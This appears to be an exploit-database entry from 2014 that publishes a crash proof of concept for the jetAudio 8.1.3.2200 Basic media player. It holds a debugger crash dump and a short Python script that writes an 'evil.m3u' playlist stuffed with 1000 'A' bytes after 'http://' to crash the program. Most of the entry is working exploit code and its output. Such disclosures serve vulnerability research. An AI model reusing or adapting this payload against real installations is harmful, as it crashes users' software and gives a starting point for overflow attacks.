jetAudio 8.1.3.2200 Crash Proof Of Concept



EKU-ID: 4465 CVE: OSVDB-ID:
Author: hadji samir Published: 2014-12-30 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


# Exploit Title         : jetAudio 8.1.3.2200 Basic (m3u) Crash POC
# Product               : jetAudio Basic
# Date                  : 27.12.2014
# Exploit Author        : Hadji Samir s-dz@hotmail.fr
# Software Link         : http://www.jetaudio.com/download/
# Vulnerable version    : 8.1.3.2200 Basic
# Vendor Homepage       : http://www.jetaudio.com/
# Tested on             : Windows 7 x86 fr
#============================================================================================
#   Open created POC file (evil.m3u) with jetAudio
#   Details
#   ((2bb0.2a60): Break instruction exception - code 80000003 (first chance)
#   eax=00000000 ebx=00000000 ecx=0012fb0c edx=76ed64f4 esi=fffffffe edi=00000000
#   eip=76f2e60e esp=0012fb28 ebp=0012fb54 iopl=0         nv up ei pl zr na pe nc
#   cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
#   *** ERROR: Symbol file could not be found.  Defaulted to export symbols for ntdll.dll - 
#   ntdll!LdrVerifyImageMatchesChecksum+0x633:
#   76f2e60e cc              int     3
#
#   0:000> kb
#   ChildEBP RetAddr  Args to Child              
#   WARNING: Stack unwind information not available. Following frames may be wrong.
#   0012fb54 76f0e2d1 7ffdf000 7ffd5000 76f6714c ntdll!LdrVerifyImageMatchesChecksum+0x633
#   0012fcb0 76ef8fc0 0012fd24 76e90000 7346e5a2 ntdll!RtlTimeToElapsedTimeFields+0x4e3d
#   0012fd00 76eeb2c5 0012fd24 76e90000 00000000 ntdll!vsnwprintf+0x3eb
#   0012fd10 00000000 0012fd24 76e90000 00000000 ntdll!LdrInitializeThunk+0x10
#============================================================================================
#!/usr/bin/python

from struct import pack
m3u = ("http://%s")
buf = "\x41" * 1000
m3u %= buf
fd = open("evil.m3u", "w")
fd.write(m3u)
fd.close()